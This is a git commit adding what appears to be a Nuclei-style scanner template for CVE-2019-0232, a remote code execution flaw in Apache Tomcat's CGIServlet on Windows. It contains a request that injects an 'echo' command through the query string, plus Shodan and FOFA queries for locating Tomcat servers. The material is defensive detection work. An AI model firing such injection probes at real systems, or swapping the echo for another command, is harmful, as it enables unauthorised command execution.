Create CVE-2019-0232.yaml

2024-09-23 18:19:53 +05:30 · 2024-09-23 18:19:53 +05:30 · 977590a4a7
parent adbd29480a
commit 977590a4a7
1 changed files with 61 additions and 0 deletions
--- a/http/cves/2019/CVE-2019-0232.yaml
+++ b/http/cves/2019/CVE-2019-0232.yaml
@ -0,0 +1,61 @@
+id: CVE-2019-0232
+
+info:
+  name: Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
+  reference:
+    - http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html
+    - http://seclists.org/fulldisclosure/2019/May/4
+    - https://access.redhat.com/errata/RHSA-2019:1712
+    - https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
+    - https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.1
+    cve-id: CVE-2019-0232
+    cwe-id: CWE-78
+    epss-score: 0.97373
+    epss-percentile: 0.99927
+    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: apache
+    product: tomcat
+    shodan-query:
+      - http.html:"apache tomcat"
+      - http.title:"apache tomcat"
+      - http.html:"jk status manager"
+      - cpe:"cpe:2.3:a:apache:tomcat"
+    fofa-query:
+      - body="jk status manager"
+      - body="apache tomcat"
+      - title="apache tomcat"
+    google-query: intitle:"apache tomcat"
+  tags: cve,cve2019,packetstorm,seclists,apache,tomcat
+
+variables:
+  sid: "{{rand_text_alpha(10)}}"
+
+http:
+  - raw:
+      - |
+        GET /?&echo+{{sid}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{sid}}"
+
+      - type: word
+        part: content/type
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200